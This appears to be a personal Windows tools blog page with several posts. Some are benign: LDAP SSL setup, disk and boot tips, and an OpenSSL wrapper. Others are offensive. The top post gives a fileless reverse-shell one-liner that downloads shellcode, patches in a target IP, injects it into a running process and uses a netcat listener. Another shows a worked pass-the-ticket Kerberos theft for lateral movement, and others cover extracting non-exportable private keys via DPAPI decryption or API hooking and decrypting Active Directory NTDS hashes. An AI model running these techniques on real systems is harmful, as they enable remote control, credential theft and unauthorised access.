Launch a reverse shell without touching disk

 network, nthash  No Responses »
Juil 312023
 

NTHASH-win64 /download2hexa /input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 /replace /old:7F000001 /new:C0A801BE|nthash-win64 /injectcodehexa /pid:996

The above will, in 3 steps :

-download a binary and convert it to its textual hexa form

-replace the default outbound ip (127.0.0.1) to the real target ip (here 192.168.1.190)

-inject the shellcode into the memory of the specified pid and execute it

on the remote host : run nc -l -p 4444 (note that you could also replace 4444 with a port of your choice in the shell code)

NTDSEXTRACT

 ldap, nthash  No Responses »
Juil 092023
 

Decrypt NTDS (aka NT Directory Service) active directory hashes for servers up to windows 2012r2 (rc4) and windows 2016 and up (aes). NTDS uses the Extensible Storage Engine format (aka ESE).

You can obtain the systemkey offline using nthash and the system registry file.

Sourcecode and binary are here.

Boot UEFI with a MBR disk

 Boot, clonedisk  No Responses »
Avr 042023
 

You need to boot in UEFI mode but do not want to convert your disk to GPT (with mbr2gpt for instance)?

-free some disk space (by shrinking you main partition for instance)

-create a FAT32 partition

-make your partition bootable with bcdboot c:\windows /s g: /f all (with g: being your new partition)

-now, shutdown your computer, modify your bios to UEFI, reboot and enjoy!

Export a certificate along its non exportable key – the easy way

 openssl, rsa, ssl  No Responses »
Mar 302023
 

In a previous article (here), we have seen how to export a certificate and its non exportable key using a rather complex method (decrypting DPAPI).

Here below how to do it the easy way (by hooking a rsaenh.dll api) :

cert –export –store=root –subject= »Root Authority » –force

-> you get a cert.pfx containing both the certificate and the private key.

Import and enjoy !

Export a certificate along its non exportable private key – the hard way

 openssl, rsa, ssl  1 Response »
Mar 262023
 

You want to export a certificate but its private key is marked as non exportable.

Lets export it using the hard way (a future article with demonstrate an easier method).

1/ Identify the cert sha1 hash and save it from registry to a cer file
cert –enumcerts –store=root
->9EC82D0810FACD26CF5DE736C4F17228DDF49BBC is the cert sha1 hash

->d673096e4c9c08d6fc03c64c44117795_e65f292c-6dbf-47f8-b70f-c52e116acc05 is the cert unique name

cert –dumpcert –store=root –hash=9EC82D0810FACD26CF5DE736C4F17228DDF49BBC
->you get a blob.cer i.e your cert (without the private key)

Lets convert this binary cert (DER format) to a PEM format:

cert.exe –der2pem –filename=blob.cer

->you get a blob.crt

2/ Decode dpapi blob located in C:\Users\%username%\AppData\Roaming\Microsoft\Crypto\RSA\%SID%
nthash-win64 /decodeblob /binary:d673096e4c9c08d6fc03c64c44117795_e65f292c-6dbf-47f8-b70f-c52e116acc05

->this is your encrypted (with a masterkey) DPAPI blob

Note : you can skip this test as the blob will be decrypted in step 4.

3/ Decrypt masterkey’s located in C:\Users\%username%\AppData\Roaming\Microsoft\Protect\%SID%
nthash-win64 /decodemks /binary:c:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001 /password:your-sha1-hash-password /save

->masterkey’s will be saved to masterkeys.ini

4/ Decrypt dpapi blob with masterkey (from masterkeys.ini)
nthash-win64 /decodeblob /binary:d673096e4c9c08d6fc03c64c44117795_e65f292c-6dbf-47f8-b70f-c52e116acc05 /save

->you get a decoded.bin
This is your decrypted DPAPI blob i.e your decrypted rsa (private) key.

5/ Convert the decrypted rsa key to a PEM format

cert.exe –rsa2pem –filename=decoded.bin

->you get a decoded.pem

Note, we could have done it in 2 steps : rsa2pvk and then pvk2pem.

6/ Create a pfx with your certificate and private key

Optionally : you can check that your certificate and private key share the same modulus.

tinyssl –print_private –filename=decoded.pem

tinyssl –print_cert –filename=blob.crt

Finally, create your pfx certificate.

tinyssl –pemtop12 –privatekey=decoded.pem –cert=blob.crt

->you get a cert.pfx, ready to import.

Enjoy!

TinySSL : FreePascal and OpenSSL

 openssl  No Responses »
Fév 252023
 

Still pursuing my journey around ldap, ssl and certificates : lets play with OpenSSL libraries.

Have a look at the code on github here.

Possible actions so far:

--genkey generate rsa keys public.pem and private.pem
--encrypt encrypt a file using public.pem
--decrypt decrypt a file using private.pem
--mkcert make a self sign root cert, read from privatekey (option) & write to ca.crt and ca.key
--mkreq make a certificate service request, read from request.key (if exist) & write to request.csr request.key
--signreq make a certificate from a csr, read from a csr filename and a cert file
--selfsign make a self sign cert, write to cert.crt cert.key
--p12topem convert a pfx to pem, write to cert.crt and cert.key
--pemtop12 convert a pem to pfx, read from cert.crt and cert.key

Example to create a root ca, a certificate signing request and a certificate (which you can use in latest chrome) :

rem if you want to reuse an existing key and therefore renew instead of recreate
tinySSL.exe --mkcert --debug=true --privatekey=ca.key --password=password --filename=ca.crt
rem recreate, not renew
rem tinySSL.exe --mkcert --debug=true --filename=ca.crt
rem renew, not recreate
tinySSL.exe --mkreq --debug=true --filename=request.csr --privatekey=request.key
rem recreate, not renew
rem tinySSL.exe --mkreq --debug=true --filename=request.csr
tinySSL.exe --signreq --debug=true --alt="DNS:*.groupe.fr" --password=password --filename=request.csr --cert=ca.crt

Note : have a look at this article if you want to test your certificate in a http ssl server.

Active Directory, LDAP and SSL

 ldap, ssl  1 Response »
Jan 222023
 

You have a running ldap server but you want to be able to use ssl.

For this you need:

1-A root CA (certificate authority) installed on the domain controller/ldap server in the computer « root » store

2-A CSR (certificate service request) triggered by the domain controller/ldap server

3-A CSR signed by your root ca thus giving you a certificate to be installed on the domain controller/ldap server in the computer « my » store

4-The root CA installed in the client/user certificate store

Step 1

openssl genrsa -des3 -out ca.key 4096

openssl req -new -x509 -days 3650 -key ca.key -out ca.crt

launch mmc.exe, load the certificate snap-in, select « computer account », choose the « trusted root CA » and import your ca.crt.

Step 2

With notepad, create the below request.inf file (adapt the CN with your server CN).

;----------------- request.inf -----------------

[Version]

Signature="$Windows NT$"

[NewRequest]

Subject = "CN=dc1.acme.com,OU=IT,DC=dc1,DC=acme,DC=com,O=ACME,L=New York,S=New York,C=US"
;
KeySpec = 1
KeyLength = 1024
Exportable = TRUE
MachineKeySet = TRUE
SMIME = False
PrivateKeyArchive = FALSE
UserProtected = FALSE
UseExistingKeySet = FALSE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"
ProviderType = 12
RequestType = PKCS10
KeyUsage = 0xa0

[EnhancedKeyUsageExtension]

OID=1.3.6.1.5.5.7.3.1 ; this is for Server Authentication

Generate your csr with certreq -new request.inf server.csr.

Step 3

Sign your csr :

openssl x509 -req -days 3650 -in request.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out server.crt

launch mmc.exe, load the certificate snap-in, select « computer account », choose the « MY » store and import your server.crt.

Reboot your DC : your ldap ssl server is now operational.

Edit :

1/

It appears it is better to put the cert in the NT Directory Services (NTDS) store (choose the NTSD service rather than « computer account » in the MMC snap-in).

Indeed, most probably your computer account will have more than one cert in its trust store and NTDS will then pick randomly one of them.

2/

Although I did have time to replicate the experiment, it may be that you have to select 2 roles (versus all) : serveur authentication and client authentication.

More here.

Step 4

On your user/client, launch mmc.exe, load the certificate snap-in, select « user account », choose the « trusted root CA » store and import your ca.crt to allow your user/client to validate the server cert.

Playing with Kerberos tickets and NTHASH

 kerberos, nthash  No Responses »
Oct 312022
 

We will be discussing privilege escalation and/or lateral movement.

The theory.

You got yourself access to a host where other users (preferably local or domain admins) are logged on?

Lets:
-List the kerberos ticket(s) with nthash-win64 /klist
-Export the tgs ticket with nthash-win64 /ask /input:service/fqdn
-Import (in another session, or another host) the (preferably tgs) ticket with nthash-win64 /binary:ticket.kirbi

Note 1 : an admin can touch on all tickets (pass on the luid parameter on)
Note 2 : if the host2/attacker is a domain joined computer, a tgt ticket may be enough (your host « should » handle the tgs when you request a service)
Note 3 : this is not about requesting/forging a ticket (see rubeus) but about stealing a ticket

Practical example.

On host1/victim, we can witness that the logged on user (user1) has access to a remote share.

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le volume dans le lecteur \WIN-BBC4BS466Q5.home.lab\temp n’a pas de nom.
Le numéro de série du volume est 763C-BB7B

Répertoire de \WIN-BBC4BS466Q5.home.lab\temp

20/02/2022 21:21 .
20/02/2022 21:21 ..
27/07/2022 17:09 1 313 792 NTHASH-win64.exe
1 fichier(s) 1 313 792 octets
2 Rép(s) 971 288 576 octets libres

And indeed, there is a ticket which we may want to steal (cifs/WIN-BBC4BS466Q5.home.lab).

nthash-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:32
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:krbtgt/home.lab
Client Name:user1
Flags:40E10000

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000

Lets export this ticket to a file (which we will be importing later on).

nthash-win64.exe /ask /input:cifs/WIN-BBC4BS466Q5.home.lab
NTHASH 1.8 x64 by erwan2212@gmail.com
Asking for: cifs/WIN-BBC4BS466Q5.home.lab
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewUntil:07/11/2022 16:26:32
ServiceName: cifs/WIN-BBC4BS466Q5.home.lab
ClientName: user1
Flags: 40A50000
KeyType: 00000012
Key:C569A92747E0972A624943E4D99EF1D6BC7CADC7E379E928179BDE816DB419A3
TicketEncType: 00000012
Ticket:6182040630820402A003020105A10A1B08484F4D452E4C4142A22B3029A00302

* KiRBi to file:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi

On host2/attacker, we witness that we do not have (yet) access to the target remote share.

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le nom d’utilisateur ou le mot de passe est incorrect.

Lets import our ticket (exported in previous step).

NTHASH-win64.exe /ptt /binary:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi
NTHASH 1.8 x64 by erwan2212@gmail.com
Ticket successfully submitted for current session

Lets confirm that our ticket now appears in our current (attacker) session.

NTHASH-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000

Lets now finally confirm that we do have access to the remote share (although we are not impersonating the original « user1 » , nor do we know user1 password).

dir \WIN-BBC4BS466Q5.home.lab\temp
Le volume dans le lecteur \WIN-BBC4BS466Q5.home.lab\temp n’a pas de nom.
Le numéro de série du volume est 763C-BB7B

Répertoire de \WIN-BBC4BS466Q5.home.lab\temp

20/02/2022 21:21 .
20/02/2022 21:21 ..
27/07/2022 17:09 1 313 792 NTHASH-win64.exe
1 fichier(s) 1 313 792 octets
2 Rép(s) 971 296 768 octets libres

Revert to basic disk without losing data

 clonedisk  No Responses »
Oct 092022
 

You have settled a new disk as « dynamic disk » and now you want to go back to basic disk.

But the option is grayed out in the windows disk manager console.

Lets see how to revert to basic disk without losing data, with CloneDisk.

This procedure applies to a MBR disk but a similar procedure can be performed on GPT disk.

Warning here : if you work on a production disk/system, please do a backup/snapshot to eventually be able to roll back your changes.

First you want to check the partition table : indeed, you do need a partition table to perform this operation and if your disk is a « data » disk, i.e not a « system » disk, your dynamic disk most probably does not have a partition table to match your existing volumes.

See the below screenshots :

-we have 2 disks (0 & 1) : one basic (system) and one dynamic (data)

-we have 4 volumes (2 on each disk)

-second disk (disk 1) does not have a partition table reflecting its volumes (since it is a dynamic disk)

You need to use the « RETAIN » diskpart command to instruct your system to create a partition table for your volumes.

Note that most probably you would not need to perform this task if your disk is a « system » one (partition table will have been taken care of already by the system).

Now, lets have a look at the partition table again.

Much better 🙂

Now lets change the partition type for all partition (0x42 indicating a dynamic disk).

We will change our partitions (here number 4 and 2) to 0x7 aka IFS (for NTFS) and we will hide « dummy » partitions (a left over from the dynamic disk) to 0x17 aka Hidden IFS.

And we will do a offline/online to force the system to refresh its disk (we could/should actually also have performed this change offline and go online once done).

Now lets check our disk management console again and « tada » : our dynamic disk was reverted back to a basic disk 🙂

 Older Entries